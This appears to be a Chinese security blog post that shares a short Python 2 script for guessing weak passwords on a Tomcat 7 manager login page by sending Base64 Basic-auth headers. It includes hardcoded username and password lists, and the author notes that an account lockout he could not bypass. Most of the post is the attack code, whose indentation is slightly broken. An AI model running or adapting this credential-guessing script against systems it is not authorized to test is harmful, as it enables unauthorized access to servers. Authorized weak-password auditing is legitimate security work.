Tomcat口令猜解工具【Python脚本】

Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令。

测试环境:Tomcat版本 7.0

登录界面采用basic认证,Base 64加密一下,模拟浏览器进行发包

据测试,每个用户名输入5次错误的密码会锁定用户,想了一些办法,还是没能绕过,这里做个记录,有时间再完善。

目前只能用于简单的弱口令测试

Python脚本如下:

复制代码
import urllib
import urllib2
import time
import base64 

names=['admin','tomcat']
passwds=['','admin','tomcat','123456','root']
for name in names: 
    name=name.rstrip()
    for passwd in passwds:  
        passwd=passwd.rstrip()
        user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)"  
        Authorization = "Basic %s" % (base64.b64encode(name+':'+passwd))
        header = { 'User-Agent' : user_agent , 'Authorization':Authorization}  

        try:        
            url = "http://192.168.106.137:8080/manager/html"
            request = urllib2.Request(url,headers=header)
            response = urllib2.urlopen(request,timeout=5)
            result=response.read()


            if response.code ==200:
                print '[Success] '  + url+' '+name+':'+passwd 
          break
                
                
        except: 
            print '[false111] '  + url+' '+name+':'+passwd 
            time.sleep(1)
复制代码

 

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

posted @   Bypass  阅读(1265)  评论(0编辑  收藏  举报
编辑推荐:
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 2025年我用 Compose 写了一个 Todo App
· 张高兴的大模型开发实战:(一)使用 Selenium 进行网页爬虫
点击右上角即可分享
微信分享提示
SQL AI 助手